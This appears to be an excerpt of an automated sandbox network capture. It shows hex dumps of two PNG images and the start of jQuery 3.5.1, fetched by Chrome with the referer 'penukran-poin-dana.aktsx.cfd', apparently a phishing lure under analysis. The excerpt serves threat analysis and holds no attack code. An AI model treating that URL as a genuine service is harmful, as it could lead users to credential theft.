                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 27 0b c7 e8 ec 7e a2 ce c8 9f 4a b1 4a 8b 9d e5 fd 54 5d ae 93 fa 63 c5 8a 15 a4 6f 76 ec 92 1c ed a4 35 06 1b 67 59 dd cb 5e a1 f7 ff dc aa 3c 7e c6 a5 43 67 aa ac cf c7 ec e6 3c 66 90 ad fc c8 3b 1a fd ea 6b 98 81 2a cf 90 30 e8 7a 35 45 be e8 50 6b 92 1e 5c 16 50 59 3a d8 9b d2 0b 90 56 7f d9 f0 22 ae 96 c5 4a 96 0e c7 3c 6e 68 d0 a0 41 76 97 41 0d 45 c7 ef 2d c2 c8 91 23 9b 61 16 70 42 16 03 46 87 17 60 02 98 04 64 20 d0 a9 53 a7 62 18 78 ec 63 79 c9 5c 31 22 fb 1d 66 75 45 bd 05 f3 f3 06 7a e3 81 58 a8 93 fe f0 50 a7 8c 81 41 37 3f b3 15 26 47 1d 55 43 df 7b 5e 06 07 46 43 23 5a 30 73 6d 5d 06 f6 ef 63 19 6f 99 2b 3e 3a c9 f3 e7 cf 0f c8 5e 18 1c 21 db 0a fc 65 c4 f0 d2 60 10 4b 33 55 57 7e 79 f2 e4 c9 a2 aa 51 c0 47 e7 02 ac d1 2a 7b 05 c0 17 79 a0
                                                                                                                            Data Ascii: '~JJT]cov5gY^<~Cg<f;k*0z5EPk\PY:V"J<nhAvAE-#apBF`d Sbxcy\1"fuEzXPA7?&GUC{^FC#Z0sm]co+>:^!e`K3UW~yQG*{y
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: a5 b2 67 cf 5e 18 36 af d9 61 23 4b 8b 8c b1 58 5c 23 5b d9 2b 78 3e 07 7d dd 01 38 d1 da 8e 11 e7 06 1c c4 b2 15 9b 4a 0e 3b c8 53 39 09 3e ce 97 e0 06 63 22 12 86 14 d7 5b 56 60 fe c8 90 19 9d f6 b3 75 ea d4 19 90 3f 7f fe c2 aa 40 90 07 cb 69 d3 a6 75 87 d7 cb c9 aa 69 35 bd 46 40 23 c0 f9 ac c6 56 e8 f1 f0 4f d2 01 fa d5 d2 6e 01 83 d5 ec 70 9a 82 47 77 eb d6 ad cc 63 8f 3d d6 10 db cf 9b c2 0e be 26 4e b3 cf 27 bb 2d 9f c7 04 69 eb c0 4d 80 27 08 3b 4d 3d 57 74 46 57 60 69 f3 0b 8e 82 1b d3 ae 5d bb 79 08 4c c2 47 c2 55 13 43 ec 68 9d 87 c3 bc 7f e0 65 09 c5 3d ca 75 1d 1e 3a e3 b2 65 cb 96 03 58 08 2d 15 10 1f 85 b8 0c f5 ea d5 cb 8d 01 45 49 58 bc dc 03 d7 20 8d d0 be aa c0 5c 53 98 46 a6 2c f8 e8 9e f9 f4 d3 4f 9f 1c 30 60 c0 72 19 fa 60 d0 50 3d
                                                                                                                            Data Ascii: g^6a#KX\#[+x>}8J;S9>c"[V`u?@iui5F@#VOnpGwc=&N'-iM';M=WtFW`i]yLGUChe=u:eX-EIX \SF,O0`r`P=
                                                                                                                            2024-10-06 11:50:06 UTC384INData Raw: 90 88 42 3e 8a e0 fb 68 39 ce 3b a8 e6 1c 4d 9d 52 23 a0 11 d0 08 44 10 02 d8 d4 92 1b 66 a0 ef 62 b3 c5 d9 90 f4 bc 21 ca 14 1b df f6 c1 bf 4c 3b 54 55 86 08 aa 2e 2d aa 46 40 23 a0 11 70 17 81 8a 15 2b e6 ff ee bb ef de 82 17 cd 23 21 ea 8f 03 96 2d ad 6f c0 57 fe a6 5b 9d 7d 26 77 91 d3 dc 34 02 1a 01 8d 40 ea 40 20 16 67 ac 36 c0 a2 f0 54 6c 45 8f c8 d9 00 f6 33 1c 58 b8 70 e1 b0 0e 1d 3a 54 48 1d 55 a2 4b a1 11 d0 08 a4 15 04 c2 65 a1 31 a6 47 8f 1e 95 e0 ab bf 79 85 0a 15 1e 86 57 d0 2a 50 13 c5 87 43 25 60 9a 10 45 a7 3e 41 7d f3 eb e6 cd 9b e7 e0 80 97 c5 0b 16 2c 38 10 0e b2 69 19 34 02 1a 01 8d 80 13 04 c2 a5 e3 17 ca 5e a9 52 a5 7c 38 0d a9 12 ce c2 ad 5d a8 50 a1 9a f0 cd 5f 1e 67 e1 16 80 3f fe cc f8 73 4d 76 72 e2 04 6b a4 0b a7 4e 9d 3a 80
                                                                                                                            Data Ascii: B>h9;MR#Dfb!L;TU.-F@#p+#!-oW[}&w4@@ g6TlE3Xp:THUKe1GyW*PC%`E>A},8i4^R|8]P_g?sMvrkN:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.649726172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC902OUTGET /img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC466INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/png
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v60c"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:06 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="load_bg.png"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 7768
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:06 UTC924INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 02 73 42 49 54 08 08 55 ec 46 04 00 00 00 02 62 4b 47 44 00 00 aa 8d 23 32 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 1d 98 49 44 41 54 78 9c ed 9d d9 6f 5b 57 9e a0 bf df bd dc 24 52 bb 44 49 d6 ee 25 b1 9d 38 76 9c bd aa 92 54 d6 0a a6 6a aa d1 1d f4 4b d7 43 a3 1f e6 71 96 a7 01 06 03 cc fc 05 fd 32 4f 83 6e 60 80 69 34 aa a7 bb 06 18 54 01 d3 5d 93 a4 12 77 57 3a a9
                                                                                                                            Data Ascii: PNGIHDR,,tFsBITUFbKGD#2_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh-IDATxo[W$RDI%8vTjKCq2On`i4T]wW:
                                                                                                                            2024-10-06 11:50:06 UTC1390INData Raw: df ba 2d e2 72 97 58 42 2f 2f 73 0a bf 96 aa 00 84 14 23 7c c6 84 9b 8e 9a 59 e9 02 ec 22 c2 0b bc 49 2f 46 a5 0b e2 39 0c 3a 18 c2 cf 92 7b b2 f3 6e 11 cb e4 14 6f 72 89 3a 37 fd ea 3c 84 22 44 3f dd 6c b1 ea 8e 23 e8 0e b1 5a f8 01 af d2 e9 b2 86 d9 6b 08 2d 0c 11 61 99 ad 4a 17 c5 0d 62 99 3c c1 db 9c 23 e0 8e 5f 9a c7 09 d0 c3 09 b6 58 a9 f4 d1 ac b4 58 61 5e e6 75 da 2b 5c 8a ea a2 89 41 02 cc 93 aa 64 21 2a 29 96 d0 c7 db 5c d4 99 75 c7 09 d0 4b 27 6b 95 1c 24 58 39 b1 82 3c cb db f4 e8 b8 aa 24 08 6d 0c a2 58 a8 54 a7 4f a5 c4 6a e2 35 5e 22 a2 eb aa 12 52 47 3f 61 e6 2b 33 12 a2 32 62 f5 f1 2e e7 f0 55 e4 bd 6b 09 93 2e ba 58 61 b5 12 6f 5d 6e 7c 3c cd bb 9c 28 fb fb d6 26 42 0b 03 c4 59 2c f7 4c cb 72 8b 55 cf 2b bc 4a a3 6e 02 cb 48 1d 03 f8 98
                                                                                                                            Data Ascii: -rXB//s#|Y"I/F9:{nor:7<"D?l#Zk-aJb<#_XXa^u+\Ad!*)\uK'k$X9<$mXTOj5^"RG?a+32b.Uk.Xao]n|<(&BY,LrU+JnH
                                                                                                                            2024-10-06 11:50:06 UTC1390INData Raw: a1 a7 d2 17 8f 20 8f 7e c0 bb 2f 03 6a fb 8f f5 e8 8f ca 3e ce 10 f1 ea 62 89 8a b6 bd 69 52 df 63 d7 84 b3 98 5a ac e2 10 7c 06 4a 61 88 a5 2c c0 c0 10 83 16 df b3 4d 4d 81 88 ef 44 a4 de 67 1a 82 a0 d8 4a 6f a5 37 52 bf 5f 98 88 2f a7 d2 2a 60 6c 66 d2 ca 27 19 04 13 8b b4 97 be 07 93 27 b9 bf db 9c c7 c5 0a d3 8d 68 b1 8a 23 64 84 cd 4d 2b 69 a1 7c d2 1d bc d0 38 18 e9 6d 78 b6 a7 bf a3 b9 c1 e7 f3 fb 03 01 d3 14 11 10 b0 32 96 95 ce c4 d6 13 89 b5 8d 91 b9 9b b3 0f 63 9f ce df dd 50 4a 24 60 c0 46 c6 43 5f 84 70 82 30 eb bb 6f d8 cd 59 fe 40 2f ae 56 2c a6 d4 19 f5 e6 f9 c8 c5 d6 b7 86 06 3a ba 3b 9a 9b 7c 3e c9 a3 8d b3 ac 64 62 7c 7a 64 e6 d7 f7 bf 5e bc bb be 9c 8e 17 b9 79 6e 99 49 f3 4b 6e ef 5c 7d fc 03 7f 9f 37 75 7d 55 18 82 64 b7 4f 56 60 18
                                                                                                                            Data Ascii: ~/j>biRcZ|Ja,MMDgJo7R_/*`lf''h#dM+i|8mx2cPJ$`FC_p0oY@/V,:;|>db|zd^ynIKn\}7u}UdOV`
                                                                                                                            2024-10-06 11:50:06 UTC1390INData Raw: a6 59 5f ef ce 33 bb 2a c7 47 2b 64 a7 7f f9 dc fe 43 70 fd 2f 55 93 45 ec ca ca 00 c2 b4 b8 bb 21 04 4f 84 ad 1a b0 13 0e 11 0f 89 a5 f1 08 16 ad 84 6d b1 fc 04 b5 58 1a c7 08 e2 b7 c5 32 dc 9e 6c d0 78 0a 41 6c b1 22 7a 45 77 af e0 e2 91 4d 3b 08 f5 b6 58 1d fa 94 cb 33 78 e1 9b 32 e8 04 03 a1 42 43 6d 35 55 8a d0 86 18 08 41 2d 96 c6 41 84 20 62 9f 15 6a bc 82 7b 27 7f ed c6 04 03 c3 1b b3 9f 75 a5 0a 9e 49 13 fb 30 0c 82 de d8 35 c7 23 87 54 03 e0 27 64 50 a7 27 d6 6b 1c 45 e1 a7 de c8 0e cc d2 78 03 4f 04 59 01 ea 0c 82 de 88 b1 34 e0 99 80 c0 4f c8 c0 ef 8d 0e 1d 1d bc 7b 06 85 81 df c0 f0 46 3f 81 07 8a a8 c9 62 60 d8 62 69 34 ce 62 18 18 ba 0b 5a e3 30 82 e8 1a 4b e3 3c 62 f7 15 7a 01 e5 8d 62 6a 00 10 0c 9f 37 9a 42 3b 74 f7 44 0e a7 a4 ec 9f 0b
                                                                                                                            Data Ascii: Y_3*G+dCp/UE!OmX2lxAl"zEwM;X3x2BCm5UA-A bj{'uI05#T'dP'kExOY4O{F?b`bi4bZ0K<bzbj7B;tD
                                                                                                                            2024-10-06 11:50:06 UTC1390INData Raw: 0b 29 f0 8b c2 c2 3e 3f 75 ed 41 aa 2c 06 5f f3 f7 3c 8a 0c 77 78 96 f7 bc b1 13 18 9c 08 fe b4 fb fd f3 cf 9f 6b 6a 14 87 93 a6 4a 25 12 73 8b b3 8b df 8c fd e2 fe b7 b1 99 24 ca 13 8d 90 1b c8 f0 21 5f 66 af ec 3e 68 1d fc 09 8d 5e f8 39 8a 04 c4 27 1d fe b7 3b 7f 72 fa e2 d0 89 ae 80 43 3d 6b eb eb f3 8b c3 d3 9f 0c ff 76 f6 e1 66 dc 52 ac a5 13 96 ae 9f f2 44 88 f1 f3 6c 16 eb 71 b1 42 fc 31 83 de 38 8e 82 88 89 22 6c 9e 8f fc a4 ef 95 c1 b3 03 6d cd c7 d5 4b 59 f1 c4 e2 d2 cc d2 fd 99 af a6 af cc 3e dc 5a 4c fb 48 29 85 21 82 a5 0c 71 75 4a d2 3d 08 0f f9 3b e2 3b 57 77 f3 03 de f0 86 58 60 8f 51 b4 bb 72 c3 e6 0f db 5e 8a 7e 7f f0 64 77 5b 4b 30 18 c8 6b f3 74 cb 4a 25 13 c9 95 b5 b9 a5 3b 33 b7 17 3e 9a 1e dd 9c 4b 66 bb f2 74 68 7e 0c 84 2b fc 76
                                                                                                                            Data Ascii: )>?uA,_<wxkjJ%s$!_f>h^9';rC=kvfRDlqB18"lmKY>ZLH)!quJ=;;WwX`Qr^~dw[K0ktJ%;3>Kfth~+v
                                                                                                                            2024-10-06 11:50:06 UTC1284INData Raw: 9e c5 3e 17 bc e9 d4 cb 39 d9 25 33 0f f4 e8 09 62 9e 44 48 f2 79 e1 c3 f9 72 e3 a4 58 8a 59 fc 74 e9 fe 43 cf 21 a4 f9 8a cf 0f 5b ac b6 50 9c 95 20 c3 34 21 dd 7f e8 39 2c ae f2 4f ce ae 82 e6 74 ed 92 66 9a 30 9d 5a 2d 0f a1 f8 96 2b 85 0f 3e 3e 1c e7 9b ad 14 53 44 88 6a b5 3c 82 e2 16 1f 17 d3 dd 7c 30 a5 88 87 92 4c d1 a8 73 f1 1e e1 0e 1f e5 da c1 ab 18 4a 13 68 27 99 a1 45 0f 5d 76 3d 8a 07 7c c4 4a 29 5e ba 54 67 70 71 a6 88 d0 a6 1b 44 17 a3 b8 c3 47 2c 95 e6 c5 4b 97 1a 88 33 a1 63 2d 17 a3 b8 e9 4c af e0 c1 94 32 e7 94 64 92 7a a2 7a 48 8d eb 10 2c be e5 e3 52 c4 56 59 4a 9b cc 4c 32 81 9f a8 4e 99 ba 0a 21 cd 55 ae 38 7f 26 b8 9b 52 7f e5 29 26 31 e9 d4 1d 3d ae 41 48 f2 25 bf 75 3a 6f b5 97 d2 d7 25 69 a6 48 d3 a5 bb a7 5d 81 b0 c5 e7 7c 5e
                                                                                                                            Data Ascii: >9%3bDHyrXYtC![P 4!9,Otf0Z-+>>SDj<|0LsJh'E]v=|J)^TgpqDG,K3c-L2dzzH,RVYJL2N!U8&R)&1=AH%u:o%iH]|^


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.649725172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC904OUTGET /img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC468INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/png
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v60d"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:07 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="load_spin.png"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 4995
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:07 UTC922INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 02 73 42 49 54 08 08 55 ec 46 04 00 00 00 02 62 4b 47 44 00 00 aa 8d 23 32 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 12 c3 49 44 41 54 78 9c ed 9d fb 7b 14 c7 95 86 df ee e9 b9 68 74 07 dd 25 40 92 01 87 18 db ac f1 25 b6 49 6c 60 7d d9 c7 bb 4f fe d9 b5 71 b2 eb 38 76 12 67 37 b0 b6 93 80 6d 6c 23 10 20 09 dd 10 92 46 d2 8c a6 a7 7b 7f e8 ea ea ea d1 48 9a 6b f7 80 ea
                                                                                                                            Data Ascii: PNGIHDRQfsBITUFbKGD#2_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh-IDATx{ht%@%Il`}Oq8vg7ml# F{Hk
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 20 03 96 f8 86 3f f0 2d cb 11 9a 45 19 2d 5d 8c f3 1c a3 64 85 46 82 ba a5 c0 23 ee b2 e4 87 ce 56 5b d6 e2 f3 8b 4e a7 b8 c0 fb bc 10 52 46 92 24 3b dc e2 73 fe c6 5c 7c 35 b3 42 8b 49 2f 27 98 64 b0 2c 84 39 ec b2 c8 0c ab de 87 5b 6b 61 0b cf 2e bb 7a 9a 0f b9 48 27 26 a6 92 31 b6 f9 9a ff e4 5b 76 22 30 e5 50 28 b4 24 19 e3 79 46 48 84 ea 16 87 3c 73 dc 63 cb fb 50 eb 6c 6d d9 99 45 17 b3 5c e6 3d 06 a4 32 bc 91 54 8e eb 7c ca 4d 76 5b 6c 44 8d 90 b4 58 0c 73 9a 51 ac 50 c5 e2 b0 c1 3d 1e 79 c1 ab 55 36 b7 e4 bc b2 63 93 fc 07 2f 92 0c 29 63 8b af f9 84 ef e3 1a e7 1f 06 69 bb c9 10 67 18 22 11 ca 29 36 4b dc 23 e7 7d a4 15 b6 b7 e0 9c a2 4b 19 de e6 aa d4 86 45 82 24 79 be e1 1a b7 db 95 0c 1f 92 94 04 03 4c 33 24 c6 5f be 4e b6 78 e0 27 f9 e6 f7 a0
                                                                                                                            Data Ascii: ?-E-]dF#V[NRF$;s\|5BI/'d,9[ka.zH'&1[v"0P($yFH<scPlmE\=2T|Mv[lDXsQP=yU6c/)cig")6K#}KE$yL3$_Nx'
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 42 c4 84 7b 50 9f 6f eb 85 70 d1 a3 5c 21 29 b9 54 d4 65 53 2f 66 88 1e e5 84 a4 65 c0 b2 fd fb 0b 6a 44 09 49 88 08 58 41 42 df a6 a8 f5 11 3d c2 0a 51 03 56 ae be a5 90 1a 8d 21 4c 48 90 d0 77 f5 84 7b 3c 10 84 ec 09 58 3b 7a e7 47 3c 50 15 a2 06 ac ed 38 8c d1 08 13 12 04 ac a2 5e 7f 15 17 4c e5 55 52 be 2e e8 80 15 17 82 cd ed 96 0c 58 e8 84 1e 1f 02 85 04 db dc 4b ca 3e 52 8d 88 a1 12 e2 c3 a6 a4 03 56 5c 08 9e fc 17 2c bb de ad 77 c3 a2 46 e3 f0 09 49 28 19 a4 58 f9 a3 1a 51 c0 94 45 a1 1f a3 1c 4d 48 9c f0 15 62 29 84 e8 0c 12 23 7c 42 82 94 5e 3a f8 01 8e 1a ad 85 ff a8 df 20 a5 17 f5 2c 6f 9c f0 08 49 28 c3 5f 9d 41 62 45 39 21 6e fd b7 4d d1 68 06 cc 3d 63 2c 9d d2 63 85 af 10 1f 8e 2e 0a e3 85 a9 fc 86 ba 6e 06 a1 d1 4c 94 13 a2 f5 11 33 4c 08
                                                                                                                            Data Ascii: B{Pop\!)TeS/fejDIXAB=QV!LHw{<X;zG<P8^LUR.XK>RV\,wFI(XQEMHb)#|B^: ,oI(_AbE9!nMh=c,c.nL3L
                                                                                                                            2024-10-06 11:50:07 UTC1293INData Raw: 71 76 80 21 bc 6a c3 fb 6f 93 f5 46 d4 d1 d8 37 03 c3 d2 bc c9 cb a4 04 25 16 0e d7 f9 9c ed 86 4f df a6 90 89 7c 84 63 b8 94 28 e1 e0 60 f3 84 75 ef 7f 36 d2 eb 06 3d 26 07 7d af f2 2b 3a 30 05 25 09 6e f3 29 0b 4d 69 a2 ad 20 03 71 27 13 74 e1 50 12 84 14 79 ec 6f e1 68 ac bf 0d 7b 4b 56 a9 2f f2 0e 3d 98 82 90 24 ab fc 37 5f 7b 17 b5 9e 15 4a 64 5f 87 18 c3 12 54 94 70 28 b0 cc 26 34 a3 a7 4d f1 95 30 f4 0c ef 33 88 21 f2 49 92 12 df f2 7b 16 9b d8 50 8c 90 da e8 e2 04 fd b8 d8 82 0c 87 2d 16 9b 17 a0 9b e4 27 61 ee 38 1f 30 25 02 57 02 0b 8b 25 ae 3d 0b 29 5e 6a 63 98 93 a4 65 a0 72 28 b1 ce 23 6f 23 79 73 fa d7 34 2f 09 93 7b b9 ca 05 d2 32 74 59 d8 5c e7 da d3 ac 13 25 6f 4c 32 04 42 1b 25 1c 6c 96 59 6a 6e 58 6e a2 87 e4 e8 e3 22 ef 2a a1 cb c2 62
                                                                                                                            Data Ascii: qv!joF7%O|c(`u6=&}+:0%n)Mi q'tPyoh{KV/=$7_{Jd_Tp(&4M03!I{P-'a80%W%=)^jcer(#o#ys4/{2tY\%oL2B%lYjnXn"*b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.649735151.101.194.1374436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC545OUTGET /jquery-3.5.1.min.js HTTP/1.1
                                                                                                                            Host: code.jquery.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC612INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 89476
                                                                                                                            Server: nginx
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                            ETag: "28feccc0-15d84"
                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Age: 3372011
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-lga21981-LGA, cache-ewr-kewr1740041-EWR
                                                                                                                            X-Cache: HIT, HIT
                                                                                                                            X-Cache-Hits: 264, 0
                                                                                                                            X-Timer: S1728215407.618042,VS0,VE1
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                                                            Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 65 2c 74 2c
                                                                                                                            Data Ascii: e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,
